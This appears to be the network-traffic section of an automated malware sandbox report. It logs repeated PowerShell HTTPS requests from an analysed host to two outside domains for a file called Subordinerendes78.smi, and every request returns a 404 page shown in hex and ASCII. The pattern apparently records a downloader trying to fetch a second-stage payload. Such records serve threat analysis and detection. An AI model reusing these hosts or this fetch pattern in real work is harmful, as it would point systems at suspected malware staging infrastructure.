                                                  Date: Thu, 05 Dec 2024 09:42:16 GMT
                                                  Server: Apache
                                                  Content-Length: 315
                                                  Connection: close
                                                  Content-Type: text/html; charset=iso-8859-1
                                                  2024-12-05 09:42:16 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  6192.168.2.449742148.251.114.2334437016C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-12-05 09:42:21 UTC98OUTGET /wh/Subordinerendes78.smi HTTP/1.1
                                                  Host: www.erp-royal-crown.info
                                                  Connection: Keep-Alive
                                                  2024-12-05 09:42:22 UTC238INHTTP/1.1 404 Not Found
                                                  Connection: close
                                                  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                  pragma: no-cache
                                                  content-type: text/html
                                                  content-length: 1251
                                                  date: Thu, 05 Dec 2024 09:42:22 GMT
                                                  server: LiteSpeed
                                                  2024-12-05 09:42:22 UTC1130INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                  2024-12-05 09:42:22 UTC121INData Raw: 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 69 74 65 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                  Data Ascii: Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  7192.168.2.449743184.171.244.2314437016C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-12-05 09:42:27 UTC89OUTGET /wh/Subordinerendes78.smi HTTP/1.1
                                                  Host: www.almrwad.com
                                                  Connection: Keep-Alive
                                                  2024-12-05 09:42:28 UTC164INHTTP/1.1 404 Not Found
                                                  Date: Thu, 05 Dec 2024 09:42:28 GMT
                                                  Server: Apache
                                                  Content-Length: 315
                                                  Connection: close
                                                  Content-Type: text/html; charset=iso-8859-1
                                                  2024-12-05 09:42:28 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  8192.168.2.449744148.251.114.2334437016C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-12-05 09:42:33 UTC98OUTGET /wh/Subordinerendes78.smi HTTP/1.1
                                                  Host: www.erp-royal-crown.info
                                                  Connection: Keep-Alive
                                                  2024-12-05 09:42:34 UTC238INHTTP/1.1 404 Not Found
                                                  Connection: close
                                                  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                  pragma: no-cache
                                                  content-type: text/html
                                                  content-length: 1251
                                                  date: Thu, 05 Dec 2024 09:42:33 GMT
                                                  server: LiteSpeed
                                                  2024-12-05 09:42:34 UTC1130INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                  2024-12-05 09:42:34 UTC121INData Raw: 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 69 74 65 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                  Data Ascii: Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  9192.168.2.449746184.171.244.2314437016C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-12-05 09:42:39 UTC89OUTGET /wh/Subordinerendes78.smi HTTP/1.1
                                                  Host: www.almrwad.com
                                                  Connection: Keep-Alive
                                                  2024-12-05 09:42:40 UTC164INHTTP/1.1 404 Not Found
                                                  Date: Thu, 05 Dec 2024 09:42:40 GMT
                                                  Server: Apache
                                                  Content-Length: 315
                                                  Connection: close
                                                  Content-Type: text/html; charset=iso-8859-1
                                                  2024-12-05 09:42:40 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  10192.168.2.449758148.251.114.2334437016C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-12-05 09:42:45 UTC98OUTGET /wh/Subordinerendes78.smi HTTP/1.1
                                                  Host: www.erp-royal-crown.info
                                                  Connection: Keep-Alive
                                                  2024-12-05 09:42:46 UTC238INHTTP/1.1 404 Not Found
                                                  Connection: close
                                                  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                  pragma: no-cache
                                                  content-type: text/html
                                                  content-length: 1251
                                                  date: Thu, 05 Dec 2024 09:42:45 GMT
                                                  server: LiteSpeed
                                                  2024-12-05 09:42:46 UTC1130INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                  2024-12-05 09:42:46 UTC121INData Raw: 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 69 74 65 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                  Data Ascii: Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  11192.168.2.449774184.171.244.2314437016C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-12-05 09:42:51 UTC89OUTGET /wh/Subordinerendes78.smi HTTP/1.1
                                                  Host: www.almrwad.com
                                                  Connection: Keep-Alive
                                                  2024-12-05 09:42:51 UTC164INHTTP/1.1 404 Not Found
                                                  Date: Thu, 05 Dec 2024 09:42:51 GMT
                                                  Server: Apache
                                                  Content-Length: 315
                                                  Connection: close
                                                  Content-Type: text/html; charset=iso-8859-1
                                                  2024-12-05 09:42:51 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  12192.168.2.449786148.251.114.2334437016C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-12-05 09:42:57 UTC98OUTGET /wh/Subordinerendes78.smi HTTP/1.1
                                                  Host: www.erp-royal-crown.info
                                                  Connection: Keep-Alive
                                                  2024-12-05 09:42:57 UTC238INHTTP/1.1 404 Not Found
                                                  Connection: close
                                                  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                  pragma: no-cache
                                                  content-type: text/html
                                                  content-length: 1251
                                                  date: Thu, 05 Dec 2024 09:42:57 GMT
                                                  server: LiteSpeed
                                                  2024-12-05 09:42:57 UTC1130INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                  2024-12-05 09:42:57 UTC121INData Raw: 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 69 74 65 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                  Data Ascii: Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  13192.168.2.449801184.171.244.2314437016C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-12-05 09:43:03 UTC89OUTGET /wh/Subordinerendes78.smi HTTP/1.1
                                                  Host: www.almrwad.com
                                                  Connection: Keep-Alive
                                                  2024-12-05 09:43:03 UTC164INHTTP/1.1 404 Not Found
                                                  Date: Thu, 05 Dec 2024 09:43:03 GMT
                                                  Server: Apache
                                                  Content-Length: 315
                                                  Connection: close
                                                  Content-Type: text/html; charset=iso-8859-1
                                                  2024-12-05 09:43:03 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  14192.168.2.449817148.251.114.2334437016C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-12-05 09:43:08 UTC98OUTGET /wh/Subordinerendes78.smi HTTP/1.1
                                                  Host: www.erp-royal-crown.info
                                                  Connection: Keep-Alive
                                                  2024-12-05 09:43:09 UTC238INHTTP/1.1 404 Not Found
                                                  Connection: close
                                                  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                  pragma: no-cache
                                                  content-type: text/html
                                                  content-length: 1251
                                                  date: Thu, 05 Dec 2024 09:43:09 GMT
                                                  server: LiteSpeed
                                                  2024-12-05 09:43:09 UTC1130INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                  2024-12-05 09:43:09 UTC121INData Raw: 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 69 74 65 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                  Data Ascii: Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  15192.168.2.449833184.171.244.2314437016C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-12-05 09:43:14 UTC89OUTGET /wh/Subordinerendes78.smi HTTP/1.1
                                                  Host: www.almrwad.com
                                                  Connection: Keep-Alive
                                                  2024-12-05 09:43:15 UTC164INHTTP/1.1 404 Not Found
                                                  Date: Thu, 05 Dec 2024 09:43:15 GMT
                                                  Server: Apache
                                                  Content-Length: 315
                                                  Connection: close
                                                  Content-Type: text/html; charset=iso-8859-1
                                                  2024-12-05 09:43:15 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  16192.168.2.449844148.251.114.2334437016C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-12-05 09:43:20 UTC98OUTGET /wh/Subordinerendes78.smi HTTP/1.1
                                                  Host: www.erp-royal-crown.info
                                                  Connection: Keep-Alive
                                                  2024-12-05 09:43:21 UTC238INHTTP/1.1 404 Not Found
                                                  Connection: close
                                                  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                  pragma: no-cache
                                                  content-type: text/html
                                                  content-length: 1251
                                                  date: Thu, 05 Dec 2024 09:43:20 GMT
                                                  server: LiteSpeed
                                                  2024-12-05 09:43:21 UTC1130INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                  2024-12-05 09:43:21 UTC121INData Raw: 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 69 74 65 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                  Data Ascii: Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
